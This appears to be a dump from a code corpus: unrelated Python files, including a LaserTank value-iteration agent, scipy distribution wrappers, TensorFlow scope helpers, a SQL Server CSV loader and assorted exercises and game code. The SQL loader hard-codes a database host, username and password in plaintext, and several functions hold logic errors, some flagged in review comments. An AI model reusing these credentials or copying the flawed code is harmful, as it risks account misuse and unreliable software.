        # handle ice tile - slide until first non-ice tile or blocked
        if game_map.player_heading == LaserTankMap.UP:
            for i in range(next_y, -1, -1):
                if game_map.grid_data[i][next_x] != LaserTankMap.ICE_SYMBOL:
                    if game_map.grid_data[i][next_x] == LaserTankMap.WATER_SYMBOL:
                        # slide into water - game over
                        action_reward = game_map.game_over_cost
                        action_value = self.values[next_x - 1][i - 1][next_heading]
                        return action_reward, action_value
                    elif LaserTankMap.cell_is_blocked(game_map, i, next_x):
                        # if blocked, stop on last ice cell
                        next_y = i + 1
                        break
                    else:
                        next_y = i
                        break
        elif game_map.player_heading == LaserTankMap.DOWN:
            for i in range(next_y, game_map.y_size):
                if game_map.grid_data[i][next_x] != LaserTankMap.ICE_SYMBOL:
                    if game_map.grid_data[i][next_x] == LaserTankMap.WATER_SYMBOL:
                        # slide into water - game over
                        action_reward = game_map.game_over_cost
                        action_value = self.values[next_x - 1][i - 1][next_heading]
                        return action_reward, action_value
                    elif LaserTankMap.cell_is_blocked(game_map, i, next_x):
                        # if blocked, stop on last ice cell
                        next_y = i - 1
                        break
                    else:
                        next_y = i
                        break
        elif game_map.player_heading == LaserTankMap.LEFT:
            for i in range(next_x, -1, -1):
                if game_map.grid_data[next_y][i] != LaserTankMap.ICE_SYMBOL:
                    if game_map.grid_data[next_y][i] == LaserTankMap.WATER_SYMBOL:
                        # slide into water - game over
                        action_reward = game_map.game_over_cost
                        action_value = self.values[i - 1][next_y - 1][next_heading]
                        return action_reward, action_value
                    elif LaserTankMap.cell_is_blocked(game_map, next_y, i):
                        # if blocked, stop on last ice cell
                        next_x = i + 1
                        break
                    else:
                        next_x = i
                        break
        else:
            for i in range(next_x, game_map.x_size):
                if game_map.grid_data[next_y][i] != LaserTankMap.ICE_SYMBOL:
                    if game_map.grid_data[next_y][i] == LaserTankMap.WATER_SYMBOL:
                        # slide into water - game over
                        action_reward = game_map.game_over_cost
                        action_value = self.values[i - 1][next_y - 1][next_heading]
                        return action_reward, action_value
                    elif LaserTankMap.cell_is_blocked(game_map, next_y, i):
                        # if blocked, stop on last ice cell
                        next_x = i - 1
                        break
                    else:
                        next_x = i
                        break
    if game_map.grid_data[next_y][next_x] == LaserTankMap.TELEPORT_SYMBOL:
        # handle teleport - find the other teleporter
        tpy, tpx = (None, None)
        for i in range(game_map.y_size):
            for j in range(game_map.x_size):
                if game_map.grid_data[i][j] == LaserTankMap.TELEPORT_SYMBOL and i != next_y and j != next_x:
                    tpy, tpx = (i, j)
                    break
            if tpy is not None:
                break
        if tpy is None:
            raise Exception(
                "LaserTank Map Error: Unmatched teleport symbol")
        next_y, next_x = (tpy, tpx)
    else:
        # if not ice or teleport, perform collision check
        if LaserTankMap.cell_is_blocked(game_map, next_y, next_x):
            action_reward = game_map.collision_cost
            # Blocked: keep the *current* cell's value, not the destination's.
            action_value = self.values[game_map.player_x - 1][game_map.player_y - 1][next_heading]
            return action_reward, action_value
    # check for game over conditions
    if LaserTankMap.cell_is_game_over(game_map, next_y, next_x):
        action_reward = game_map.game_over_cost
        action_value = self.values[next_x - 1][next_y - 1][next_heading]
    elif game_map.grid_data[game_map.player_y][game_map.player_x] == LaserTankMap.FLAG_SYMBOL:
        # NOTE(review): this tests the player's *current* cell for the flag
        # rather than the destination (next_y, next_x) -- verify intent.
        action_reward = game_map.goal_reward
        action_value = self.values[next_x - 1][next_y - 1][next_heading]
    else:
        action_reward = game_map.move_cost
        action_value = self.values[next_x - 1][next_y - 1][next_heading]
    return action_reward, action_value
# Script entry point: run the grid-world value-iteration demo.
if __name__ == "__main__":
    run_value_iteration()
| true |
b0629ca7ba24cee6c36c50e1c2be2f21002639e7 | Python | Di-ayy-go/fact-ai | /python/distributions.py | UTF-8 | 5,110 | 3.234375 | 3 | [] | no_license | import numpy as np
import numpy as np  # the class bodies below reference the conventional `np` alias
import scipy.stats as sc

from random_handler import RandomHandler
class UniformDistribution(sc.distributions.rv_frozen):
    """
    Wrapper around the frozen scipy uniform distribution.

    Adds the threshold/value tables and the helper methods needed to
    reproduce the paper's results.

    args:
        loc (int): mean of distribution
        scale (int): range/standard deviation of distribution
        n (int): number of samples to be generated
            (placeholder so this class stays interchangeable with
            BinomialDistribution)
    """

    def __init__(self, loc, scale, n):
        super(UniformDistribution, self).__init__(sc.uniform, loc, scale)
        self.loc = loc
        self.scale = scale
        # Backward induction: the last value is the distribution mean, and each
        # earlier threshold equals the value one step ahead.
        thresholds = np.zeros(n)
        values = np.zeros(n)
        values[n - 1] = scale / 2
        for step in range(n - 2, -1, -1):
            thresholds[step] = values[step + 1]
            values[step] = (scale + thresholds[step]) / 2
        self.p_th = thresholds
        self.V = values

    def PThreshold(self, index):
        """Return the PThreshold value(s) stored at `index` (int or index list)."""
        return self.p_th[index]

    def Sample(self, size):
        """Draw `size` samples; thin wrapper around rvs, kept for consistency
        with the original C++ codebase."""
        return self.rvs(size=size)

    def Middle(self, n):
        """Middle value of the distribution computed from `n` values."""
        return self.scale * (1 / 2) ** (1 / n)

    def Reverse(self, x):
        """Map `x` from the unit interval back onto the distribution's scale."""
        return x * self.scale
class BinomialDistribution(sc.distributions.rv_frozen):
    """
    Wrapper for Scipy binomial distribution.
    Contains additional methods needed to reproduce results of paper.

    Precomputes, for n+1 outcomes (0..n successes):
      - choose: Pascal's triangle of binomial coefficients,
      - probability[i] = p**i, r_probability[i] = (1-p)**i,
    so that P(X = i) = choose[n][i] * probability[i] * r_probability[n-i].

    args:
        n (int): number of independent experiments
        p (int): probability of success of Bernoulli trial
    """
    def __init__(self, n, p):
        super(BinomialDistribution, self).__init__(sc.binom, n, p)
        self.n = n
        # NOTE: `n` is rebound to n+1 below (table size for outcomes 0..n);
        # _ComputeMaxDist is therefore called with n+1 as `num_dists`.
        n = n + 1
        choose = np.zeros((n, n))
        probability = np.ones(n)
        r_probability = np.ones(n)
        choose[:, 0] = 1
        # Pascal's triangle: C(i, j) = C(i-1, j-1) + C(i-1, j)
        for i in range(1, n):
            for j in range(1, n):
                choose[i][j] = choose[i - 1][j - 1] + choose[i - 1][j]
        # Powers of p and (1 - p)
        for i in range(1, n):
            probability[i] = probability[i - 1] * p
            r_probability[i] = r_probability[i - 1] * (1 - p)
        self.choose = choose
        self.probability = probability
        self.r_probability = r_probability
        self._ComputeMaxDist(n)
    def Expected(self, lower_bound):
        """
        Calculates expected value using lower bound, i.e.
        E[X/n | X/n >= lower_bound].  Based on implementation in C++ repo.

        NOTE(review): if no outcome has index >= ceil(lower_bound * n),
        `rang` stays 0 and the final division raises — confirm callers
        always pass lower_bound <= 1.

        args:
            lower_bound (int): lower bound of expected value
        """
        ans = 0
        rang = 0
        n = len(self.probability) - 1
        i = int(np.ceil(lower_bound * n))
        while i <= n:
            ans += self.probability[i] * self.r_probability[n - i] * self.choose[n][i] * i / n;
            rang += self.probability[i] * self.r_probability[n - i] * self.choose[n][i];
            i += 1
        return ans / rang
    def Reverse(self, x):
        """
        Computes reverse of x (inverse CDF on the 0..1 grid of i/n) using
        numpy arrays for efficiency.

        NOTE(review): the boolean-index fix-up below assumes `x` is an
        array-like; a bare scalar would make `result` a 0-d value and fail —
        confirm callers always pass arrays.
        """
        # a = cumulative distribution over outcome counts 0..n
        a = np.cumsum(self.choose[self.n] * self.probability * self.r_probability[::-1])
        c = x - a[..., None]
        result = np.argmax(c <= 0, axis=0) / self.n
        # argmax over an all-False column returns 0; map that "not found" case to 1
        result[result == 0] = 1
        return result
    def Sample(self, size):
        """
        Wrapper for rvs sampling method for code clarity
        and consistency with original C++ codebase.
        A uniform jitter is added and the result rescaled to (0, 1).

        args:
            size (int): number of samples to be generated
        """
        rand = np.random.uniform(size=size)
        return (self.rvs(size=size) + rand) / len(self.probability)
    def Middle(self, n):
        """
        n is passed because for compatibility. It used in UniformDistribution.
        Returns the largest grid point i/(len-1) whose max_dist is >= 0.5,
        or 0 if none qualifies.
        """
        for i in range(len(self.max_dist) - 1, -1, -1):
            if self.max_dist[i] >= 0.5:
                return i / (len(self.max_dist) - 1)
        return 0
    def _ComputeMaxDist(self, num_dists):
        """
        Internal method for computing max_dist array (distribution of the
        maximum of `num_dists` draws) and the PThreshold/V tables via
        backward induction on Expected().
        """
        max_dist = np.zeros(len(self.probability))
        x = 0
        n = self.n
        # x accumulates the upper-tail probability P(X >= i)
        for i in range(n, -1, -1):
            x += self.choose[n][i] * self.probability[i] * self.r_probability[n - i]
            max_dist[i] = 1 - (1 - x) ** num_dists
        # Computing PThreshold
        V, p_th = np.zeros(num_dists), np.zeros(num_dists)
        V[num_dists - 1] = self.Expected(0)
        for i in range(num_dists - 2, -1, -1):
            p_th[i] = V[i + 1]
            V[i] = self.Expected(p_th[i])
        self.V = V
        self.p_th = p_th
        self.max_dist = max_dist
    def PThreshold(self, index):
        # Threshold value(s) at `index`; see _ComputeMaxDist for construction.
        return self.p_th[index]
| true |
811b3d3882263967f51f24773cee0de80640277d | Python | haowen-xu/tfsnippet | /tfsnippet/utils/scope.py | UTF-8 | 2,845 | 2.703125 | 3 | [
"MIT"
] | permissive | from contextlib import contextmanager
import six
import tensorflow as tf
from tensorflow.python.ops import variable_scope as variable_scope_ops
__all__ = [
'get_default_scope_name',
'reopen_variable_scope',
'root_variable_scope',
]
def get_default_scope_name(name, cls_or_instance=None):
    """
    Generate a valid default scope name.

    Args:
        name (str): The base name.
        cls_or_instance: The class or the instance object, optional.
            If it has attribute ``variable_scope``, then ``variable_scope.name``
            will be used as a hint for the name prefix.  Otherwise, its class
            name will be used as the name prefix.

    Returns:
        str: The generated scope name.
    """
    prefix = ''
    if cls_or_instance is not None:
        vs = getattr(cls_or_instance, 'variable_scope', None)
        if isinstance(vs, tf.VariableScope):
            # use only the last path component of the existing scope name
            prefix = '{}.'.format(vs.name.rsplit('/', 1)[-1])
        else:
            klass = (cls_or_instance
                     if isinstance(cls_or_instance, six.class_types)
                     else cls_or_instance.__class__)
            prefix = '{}.'.format(klass.__name__).lstrip('_')
    # a scope name must not start with underscores
    return (prefix + name).lstrip('_')
@contextmanager
def reopen_variable_scope(var_scope, **kwargs):
    """
    Reopen the specified `var_scope` and its original name scope.

    Args:
        var_scope (tf.VariableScope): The variable scope instance.
        **kwargs: Named arguments for opening the variable scope.

    Yields:
        tf.VariableScope: The reopened variable scope.

    Raises:
        TypeError: If `var_scope` is not a ``tf.VariableScope``.
    """
    if not isinstance(var_scope, tf.VariableScope):
        raise TypeError('`var_scope` must be an instance of `tf.VariableScope`')
    # `auxiliary_name_scope=False` prevents TF from opening a fresh
    # (uniquified) name scope; we then re-enter the scope's original name
    # scope explicitly so ops created inside get the same name prefix as
    # when the scope was first opened.
    with tf.variable_scope(var_scope,
                           auxiliary_name_scope=False,
                           **kwargs) as vs:
        with tf.name_scope(var_scope.original_name_scope):
            yield vs
@contextmanager
def root_variable_scope(**kwargs):
    """
    Open the root variable scope and its name scope.

    Args:
        **kwargs: Named arguments for opening the root variable scope.

    Yields:
        tf.VariableScope: The root variable scope.
    """
    # `tf.variable_scope` does not support opening the root variable scope
    # from empty name. It always prepend the name of current variable scope
    # to the front of opened variable scope. So we get the current scope,
    # and pretend it to be the root scope.
    #
    # NOTE: this relies on TensorFlow private API (`scope._name` and
    # `variable_scope_ops._pure_variable_scope`), so it is sensitive to TF
    # version changes.  The try/finally guarantees the current scope's name
    # is restored even if opening the scope raises.
    scope = tf.get_variable_scope()
    old_name = scope.name
    try:
        scope._name = ''
        with variable_scope_ops._pure_variable_scope('', **kwargs) as vs:
            scope._name = old_name
            with tf.name_scope(None):
                yield vs
    finally:
        scope._name = old_name
| true |
b6ee58e733d445d03d8552cbd81ac2e96bbc4b41 | Python | lorenzoFerri95/LaboratoryOfDataScience | /LDS_Part1_Group5/02_dimensions.py | UTF-8 | 1,369 | 2.53125 | 3 | [] | no_license | # Load dimensions' tables to SQL Server
import pyodbc
from csv import reader

# Connection parameters for the SQL Server data mart.
server = 'tcp:apa.di.unipi.it'
database = 'Group5HWMart'
username = 'group5'
password = 'w9hez'
connectionString = 'DRIVER={ODBC Driver 17 for SQL Server};\
SERVER='+server+';DATABASE='+database+';\
UID='+username+';PWD='+password
cnxn = pyodbc.connect(connectionString)
cursor = cnxn.cursor()

# Dimensions' files (except time) and corresponding table names in SQL Server
files_tables = [("cpu.csv", "Cpu_Product"), ("geography.csv", "Geography"),
                ("gpu.csv", "Gpu_Product"), ("ram.csv", "Ram_Product"),
                ("vendor.csv", "Vendor")]

# Load every dimension file into its table.
for filename, table in files_tables:
    # `with` guarantees the file is closed even if an insert fails (the
    # original opened/closed the handle manually and leaked it on error).
    with open(filename) as fp:
        file = reader(fp)
        header = next(file)

        # Build a parameterized INSERT: row values are bound as parameters;
        # table/column names come from the trusted local CSV headers.
        tablename = "[Group5HWMart].[group5].[" + table + "] (" + ", ".join(header) + ")"
        placeholders = ",".join("?" * len(header))
        query = "INSERT INTO " + tablename + " VALUES " + "(" + placeholders + ")"

        # Execute one insert per CSV row.
        for line in file:
            cursor.execute(query, tuple(line))

# Commit once at the end and release the connection.
cursor.commit()
cursor.close()
cnxn.close()
| true |
def hourglassSum(arr):
    """
    Return the maximum "hourglass" sum in the 2D grid `arr`.

    An hourglass is the 7-cell pattern
        a b c
          d
        e f g
    anchored at every position where it fits.  Works for any grid with at
    least 3 rows and 3 columns (raises ValueError otherwise, since there is
    no hourglass to take the max of).
    """
    sums = []
    for i in range(len(arr) - 2):
        for j in range(len(arr[i]) - 2):
            # top row + middle cell + bottom row.  (The original bound this
            # to a local named `hourglassSum`, shadowing the function itself.)
            total = (arr[i][j] + arr[i][j + 1] + arr[i][j + 2]
                     + arr[i + 1][j + 1]
                     + arr[i + 2][j] + arr[i + 2][j + 1] + arr[i + 2][j + 2])
            sums.append(total)
    return max(sums)
if __name__ == '__main__':
    # Read a 6x6 grid of integers from stdin (one space-separated row per
    # line) and print the maximum hourglass sum.
    arr = []
    for _ in range(6):
        arr.append([int(z) for z in input().strip().split()])
    # print(arr)
    print(hourglassSum(arr))
| true |
def KTSNT():
    """Read an integer from stdin and print whether it is prime
    (messages are in Vietnamese: "so nguyen to" = prime number).

    Counts divisors of x from 1 to x; exactly two divisors (1 and x itself)
    means x is prime.  Stops scanning early once a third divisor is found.
    """
    x = int(input("enter x:"))
    dem = 0  # divisor count
    for i in range(1, x + 1):
        # `i` is already an int; the original's redundant int(i) cast and
        # stray trailing semicolon are gone
        if x % i == 0:
            dem = dem + 1
        if dem > 2:
            # more than two divisors -> composite, no need to keep scanning
            break
    if dem == 2:
        print("N la so nguyen to")
    else:
        print(" N k la so nguyen to")


KTSNT()
a9918c9031d924435d179d3cbbefaa49b253ef97 | Python | brnmsmith/rhinoUnfolder | /rhino_unwrapper/Map.py | UTF-8 | 1,422 | 2.578125 | 3 | [] | no_license | #Map
from rhino_helpers import getTVertsForEdge
class Map(object):
    """Keeps track of the relation between the net (unfolded) elements and
    the mesh elements.

    meshVerts maps each topology-vertex index to the list of net vertices
    created from it; meshEdges maps each topology-edge index to its net
    edges; meshFaces maps each mesh face to its single net face.
    """

    def __init__(self, mesh):
        self.meshVerts = {}
        self.meshEdges = {}
        self.meshFaces = {}
        # `range` instead of the Python-2-only `xrange`, so the class also
        # runs under Python 3 (iteration behavior is identical).
        for i in range(mesh.TopologyVertices.Count):
            self.meshVerts[i] = []
        for j in range(mesh.TopologyEdges.Count):
            self.meshEdges[j] = []
        # faces do not need to be lists, since each meshFace has one netFace

    def updateEdgeMap(self, edge, netEdge):
        """To be called immediately after adding an edge."""
        self.meshEdges[edge].append(netEdge)

    def updateVertMap(self, tVert, netVert):
        """Record that mesh vertex `tVert` produced net vertex `netVert`."""
        self.meshVerts[tVert].append(netVert)

    def getSiblingNetEdge(self, edge, netEdge):
        """For a cut edge, return the net edge paired with `netEdge`."""
        return (set(self.meshEdges[edge]) - {netEdge}).pop()

    def getNetEdges(self, meshEdge):
        """Return all net edges generated from `meshEdge`."""
        return self.meshEdges[meshEdge]

    def getRecentNetVertsForEdge(self, mesh, edge):
        """Return the most recent net vertices for both ends of `edge`."""
        meshI, meshJ = getTVertsForEdge(mesh, edge)
        netI = self.getRecentNetVert(meshI)
        netJ = self.getRecentNetVert(meshJ)
        return netI, netJ

    def getRecentNetVert(self, tVert):
        """Return the most recently added net vertex for mesh vertex `tVert`."""
        return self.meshVerts[tVert][-1]  # last item in the list
| true |
27b8df86ce8286bc6b712041ca0042fd8f7d44ac | Python | mccurrymitchell3/ems_simulation | /incidents.py | UTF-8 | 1,788 | 2.765625 | 3 | [] | no_license | import callcenter
import globals
import random
import datetime
class Incidents:
    # generates incidents at 15 minute intervals
    def __init__(self):
        #self.callRate = 1 #this will eventually be a curve
        self.intervalMax = 15  # length of one generation interval, in minutes
    # generates a random number of events for the interval and generates random
    # incident times, event times, and locations
    def generateAndAdd(self, cc):
        """Generate a random batch of incidents for the current 15-minute
        interval and push them onto `cc.cc_log` (the call-center queue)."""
        # get num events for each to be generated
        print("generating events")
        # numEvents = random.randint(6, 18) # this range is based on the min and max number of calls averaged over a week from our data source.
        # globals.now is minutes-since-midnight; split into clock hour/minute
        hour = globals.now // 60
        mins = globals.now % 60
        # NOTE(review): 'weekend' selects callfreq_weekdays_range and the
        # else-branch selects callfreq_weekends_range — this mapping looks
        # inverted; confirm against how the globals are populated.
        if globals.day_type == 'weekend':
            freq_range = globals.callfreq_weekdays_range[datetime.time(hour, mins)]
        else:
            freq_range = globals.callfreq_weekends_range[datetime.time(hour, mins)]
        numEvents = random.randint(freq_range[0], freq_range[1])
        print("numEvents:", numEvents)
        # for each event, pick a time, pick a type, assign
        for event in range(numEvents):
            # assign a random time within the interval
            timeOfEvent = globals.now + random.randint(0, self.intervalMax)
            # severity 1..8 weighted by the configured distribution
            severity = random.choices([1, 2, 3, 4, 5, 6, 7, 8], globals.severity_weights_list)[0]
            eventType = random.choice(globals.severity_to_description[severity])
            # location = random.randint(0, 9) #need to fix
            # pick a zipcode weighted by observed call frequency
            location = random.choices(list(globals.zipcode_frequency.keys()), list(globals.zipcode_frequency.values()))[0]
            print('location', location)
            print((timeOfEvent, eventType, location))
            cc.cc_log.put((timeOfEvent, eventType, location))
| true |
08be1931eaf581c4f37174532c6b6415834207c6 | Python | flacout/algorithm-bucket | /NP_reduce_2-SAT.py | UTF-8 | 1,809 | 3.265625 | 3 | [] | no_license | # python3
# Reduction to SAT
# the file output is to use with my minisat solver
# for which the format is a little different from the grader
# Input: first line holds "n m" (vertex count, edge count); the next m lines
# each hold one edge "u v" with 1-based vertex indices.
n, m = map(int, input().split())
edges = [ list(map(int, input().split())) for i in range(m) ]

#f = open('cl.txt', 'w')
# This solution prints a simple satisfiable formula
# and passes about half of the tests.
# Change this function to solve the problem.
def printEquisatisfiableSatFormula():
    """Emit the whole CNF: header, one clause per vertex, three per edge."""
    printHeader()
    for vertex in range(n):
        printVertexClause(vertex)
    for edge in edges:
        printEdgeClause(edge)
def printHeader():
    """Print "<clauses> <variables>": n at-least-one-color clauses plus
    3 inequality clauses per edge; 3 color variables per vertex."""
    clause_count = n + m * 3
    var_count = n * 3
    print('{} {}'.format(clause_count, var_count))
# clause each vertex has to be colored by some color
# vertex nb from 1 to ...n
# color 1 to 3
# CNF (V11 V12 V13)(V21 V22 V23)...(Vn1 Vn2 Vn3)
def printVertexClause(v):
    """Print the clause forcing vertex `v` (0-based) to take at least one
    of the 3 colors.

    Variable numbering: vertex v, color c in {1,2,3} -> variable v*3 + c.
    """
    col1 = (v*3)+1
    col2 = (v*3)+2
    col3 = (v*3)+3
    print(str(col1)+' '+str(col2)+' '+str(col3)+' 0')
    # Bug fix: the file handle `f` is never opened (the open() call near the
    # top of the script is commented out), so the old f.write() here raised
    # NameError at runtime.  File output stays disabled to match.
    # f.write(str(col1)+' '+str(col2)+' '+str(col3)+' 0'+'\n')
# clause vertices connected by an edge must have different colors
# CNF (!Vu1 !Vv1)(!Vu2 !Vv2)(!Vu3 !Vv3)
# CNF true if all term in parentesis are different
# if same color: (!1 !1)=0 = false CNF
def printEdgeClause(e):
    """Print the three clauses forbidding both endpoints of edge `e` from
    sharing a color.

    `e` is a pair of 1-based vertex numbers; the variable for vertex u and
    color c is (u-1)*3 + c.
    """
    # variable Vij for each vertex i color j
    # access variable number by multiplying index by 3
    vi = ((e[0]-1)*3)
    ei = ((e[1]-1)*3)
    print('-'+str(vi+1)+' -'+str(ei+1)+' 0')
    print('-'+str(vi+2)+' -'+str(ei+2)+' 0')
    print('-'+str(vi+3)+' -'+str(ei+3)+' 0')
    # Bug fix: `f` is never opened (its open() is commented out at the top of
    # the script), so these writes raised NameError.  Kept disabled to match.
    # f.write('-'+str(vi+1)+' -'+str(ei+1)+' 0'+'\n')
    # f.write('-'+str(vi+2)+' -'+str(ei+2)+' 0'+'\n')
    # f.write('-'+str(vi+3)+' -'+str(ei+3)+' 0'+'\n')
#################
# MAIN
#################
printEquisatisfiableSatFormula()
# Bug fix: `f` was never opened (its open() call is commented out above), so
# the original f.close() raised NameError after all output had been printed.
# f.close()
| true |
d822e321e50c4c036bc65bfb16ee9b211cb934d6 | Python | 6igsm0ke/Introduction-to-Programming-Using-Python-Liang-1st-edtion | /CH06/EX6.11.py | UTF-8 | 598 | 3.9375 | 4 | [] | no_license | # 6.11 (Financial application: compute commissions) Write a function that computes
# the commission, using the scheme in Exercise 5.39. The header of the function is:
# def computeCommission(salesAmount):
# Write a test program that displays the following table:
# Sales Amount Commission
# 10000 900.0
# 15000 1500.0
# ...
# 95000 11100.0
# 100000 11700.0
from CH6Module import MyFunctions
# Print the commission table for sales amounts 10000, 15000, ..., 100000
# (19 rows: range(1, 20) iterations, stepping the amount by 5000 each time).
print("Sales Amount\t\tCommission")
salesAmount = 10000
for i in range(1, 20):
    # format(" ", "14s") pads the gap between the two columns
    print(salesAmount, format(" ", "14s"), format(MyFunctions.computeCommission(salesAmount), ".1f"))
    salesAmount += 5000
| true |
66268d5bf7c98bc3de93f61bb3d83f1ff31ddff4 | Python | luukhoai/zipairline-sample | /zipairline/serializers.py | UTF-8 | 2,292 | 2.703125 | 3 | [] | no_license | from rest_framework import serializers
from rest_framework.serializers import ModelSerializer
from .models import ZipAirplane, ZipAirline
class ZipAirplaneSerializer(ModelSerializer):
    """Serializer for ZipAirplane rows, with field- and object-level validation."""

    class Meta:
        model = ZipAirplane
        fields = ('airplane_id', 'passenger_numb', 'airline')

    def validate_airplane_id(self, value):
        """
        Validate airplane_id, should be a positive integer.
        :param value: submitted airplane_id
        :return: value
        """
        if value < 0:
            raise serializers.ValidationError('airplane_id should be positive integer value.', code='input')
        return value

    def validate_passenger_numb(self, value):
        """
        Validate passenger_numb, should be a positive integer.
        :param value: submitted passenger_numb
        :return: value
        """
        if value < 0:
            # typo fixed in the user-facing message: "shoud" -> "should"
            raise serializers.ValidationError('passenger_numb should be positive integer value.')
        return value

    def validate(self, order_dict):
        """
        Object-level check: the airplane's derived fly_time must be >= 1 minute.
        :param order_dict: dict of already field-validated values
        :return: order_dict
        """
        airplane_id = order_dict['airplane_id']
        passenger_numb = order_dict['passenger_numb']
        # A throwaway (never saved) model instance, built only to read its
        # computed fly_time.  Renamed from the misleading `airline` — it
        # holds an airplane, not an airline.
        airplane = ZipAirplane(airplane_id=airplane_id, passenger_numb=passenger_numb)
        if airplane.fly_time < 1:
            raise serializers.ValidationError('fly_time should be larger than 1.')
        return order_dict
class ZipAirplaneCreateSerializer(ZipAirplaneSerializer):
    # Same validation as ZipAirplaneSerializer, but without exposing the
    # `airline` field — used for nested creation where the airline is implied
    # by the enclosing ZipAirlinesSerializer.
    class Meta:
        model = ZipAirplane
        fields = ('airplane_id', 'passenger_numb')
class ZipAirlinesSerializer(ModelSerializer):
    # Nested representation: one airline plus the list of its airplanes.
    airplanes = ZipAirplaneCreateSerializer(many=True)
    class Meta:
        model = ZipAirline
        fields = ('airline_name', 'airplanes')
    def create(self, validated_data):
        """
        Create the submitted airplanes under an existing airline.
        :param validated_data: eg: {'airline_name': 'TestAirline', 'airplanes': [...]}
        :return: airline
        """
        airline_name = validated_data.pop('airline_name')
        airplanes = validated_data.pop('airplanes')
        # NOTE(review): assumes the airline row already exists; .get() raises
        # ZipAirline.DoesNotExist otherwise — confirm that is the intended
        # behavior (no airline is created here, only its airplanes).
        airline = ZipAirline.objects.get(airline_name=airline_name)
        for airplane_data in airplanes:
            ZipAirplane.objects.create(airline=airline, **airplane_data)
        return airline
| true |
f5521afc0d0abd048b0ec68fb124c5684d2b8019 | Python | JinyongYoon/Python-for-everyone | /py4e3 - Access Web Data/exercise/exercise ch11~12.py | UTF-8 | 1,341 | 3.015625 | 3 | [] | no_license | # # Exercise (Regular Expressions)
# import re
# handle = open("/Users/jinyong/py4e/actual.txt")
# total = 0
# x = list()
# for line in handle:
# y = re.findall('[0-9]+', line)
# if len(y) == 0:
# continue
# for num in range(0, len(y)):
# total = total + int(y[num])
# print(total)
# # Exercise of HTTP Request
# import socket
# mysock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# mysock.connect(('data.pr4e.org', 80))
# cmd = 'GET http://data.pr4e.org/intro-short.txt HTTP/1.0\r\n\r\n'.encode()
# mysock.send(cmd)
# while True:
# data = mysock.recv(512)
# if len(data) < 1:
# break
# print(data.decode())
# mysock.close()
# # Exercise of urllib
# import urllib.request, urllib.parse, urllib.error
# fhand = urllib.request.urlopen('http://data.pr4e.org/romeo.txt')
# counts = dict()
# for line in fhand:
# words = line.decode().split()
# for word in words:
# counts[word] = counts.get(word, 0) + 1
# print(counts)
# # Exercise of BeautifulSoup
# import urllib.request, urllib.parse, urllib.error
# from bs4 import BeautifulSoup
# url = input('Enter - ')
# html = urllib.request.urlopen(url).read()
# soup = BeautifulSoup(html, 'html.parser')
# # Retrieve all of the anchor tags
# tags = soup('a')
# for tag in tags:
# print(tag.get('href', None))
| true |
def check(s):
    """Remove from `s` every character that occurs exactly once, except the
    two alphabetically smallest such characters, and return the result.

    Mirrors the original behaviour exactly, including its quirks: the very
    first comparison wraps around to the last sorted element, the two pops
    raise IndexError when fewer than two unique characters exist, and the
    sorted list / unique list are printed as side effects.
    """
    ordered = sorted(s)
    print(ordered)
    uniques = []
    for idx in range(len(ordered)):
        if idx < len(ordered) - 1:
            # note: at idx == 0 this compares against ordered[-1]
            # (wrap-around), exactly like the original code
            if ordered[idx] != ordered[idx + 1] and ordered[idx] != ordered[idx - 1]:
                uniques.append(ordered[idx])
    if ordered[len(s) - 1] != ordered[len(s) - 2]:
        uniques.append(ordered[len(s) - 1])
    print(uniques)
    # keep the two smallest unique characters (IndexError if fewer exist)
    uniques.pop(0)
    uniques.pop(0)
    return "".join(ch for ch in s if ch not in uniques)
# Simple CLI driver: read a string, run check(), print the result.
s=input("Enter a string: ")
ans = check(s)
print(ans)
| true |
6ea3519ad455054757993295cdaa18f7267c8c1c | Python | Eliogeno/Space-Game | /my_space_game.py | UTF-8 | 8,890 | 2.78125 | 3 | [] | no_license | # Intro to GameDev - main game file
import pgzrun
import random
WIDTH = 1000
HEIGHT = 600
SCOREBOX_HEIGHT = 60
#keep track of score
score = 0
junk_collect = 0
level = 0
level_screen = 0
lvl2_LIMIT = 5
lvl3_LIMIT = 10
#sprite speeds
JUNK_SPEED = 5
SATELLITE_SPEED = 3
DEBRIS_SPEED = 3
LASER_SPEED = -5 # lasers are moving towards the left on screen
BACKGROUND_IMG = "background_logo"
PLAYER_IMG = "player"
JUNK_IMG = "space_junk"
SATELLITE_IMG = "satellite_adv"
DEBRIS_IMG = "space_debris2"
LASER_IMG = "laser_red"
START_IMG = "start_button"
INSTRUCTIONS_IMG = "instructions_button"
def init():
    """(Re)create all game sprites and restart the background music.

    Sprites spawn just off the left edge (negative x) and scroll rightwards.
    Rebinds the module-level globals, so this also serves as the reset used
    when a finished game restarts.
    """
    global player, junks, lasers, satellite, debris
    player = Actor(PLAYER_IMG)
    player.midright = (WIDTH - 15, HEIGHT/2)
    # initialize junk sprites
    junks = [] # list to keep track of junks
    for i in range(5):
        junk = Actor(JUNK_IMG) # create a junk sprite
        x_pos = random.randint(-500, -50)
        y_pos = random.randint(SCOREBOX_HEIGHT, HEIGHT - junk.height)
        junk.topright = (x_pos, y_pos) # rect_position = (x, y)
        junks.append(junk)
    # initialize lasers
    lasers = []
    player.laserActive = 1
    # initialize satellite
    satellite = Actor(SATELLITE_IMG) # create sprite
    x_sat = random.randint(-500, -50)
    y_sat = random.randint(SCOREBOX_HEIGHT, HEIGHT - satellite.height)
    satellite.topright = (x_sat, y_sat) # rect_position
    # initialize debris
    debris = Actor(DEBRIS_IMG)
    x_deb = random.randint(-500, -50)
    y_deb = random.randint(SCOREBOX_HEIGHT, HEIGHT - debris.height)
    debris.topright = (x_deb, y_deb)
    # background music
    music.play("spacelife")
# initialize title screen buttons
# (module-level so on_mouse_down() and draw() can reach them directly)
start_button = Actor(START_IMG)
start_button.center = (WIDTH/2, 425)
instructions_button = Actor(INSTRUCTIONS_IMG)
instructions_button.center = (WIDTH/2, 500)
def on_mouse_down(pos):
    """Pygame Zero mouse hook: react to clicks on the title-screen buttons."""
    global level, level_screen
    if start_button.collidepoint(pos):
        # jump straight to level 1's title card
        level, level_screen = 1, 1
        print("start button pressed!")
    if instructions_button.collidepoint(pos):
        level = -1  # sentinel value: show the instructions screen
        print("instructions button pressed!")
# game loop
init()  # build the initial sprites once at import time, before pgzrun starts
def update():
    """Pygame Zero frame hook: advance the level / screen state machine.

    level: -1 instructions, 0 main menu, 1..3 gameplay levels.
    level_screen: odd values (1, 3, 5) are level title cards, even values
    (2, 4, 6) are the matching gameplay screens; ENTER advances a card.
    """
    global score, junk_collect, level, level_screen, BACKGROUND_IMG
    if junk_collect == lvl2_LIMIT: # level 2
        level = 2
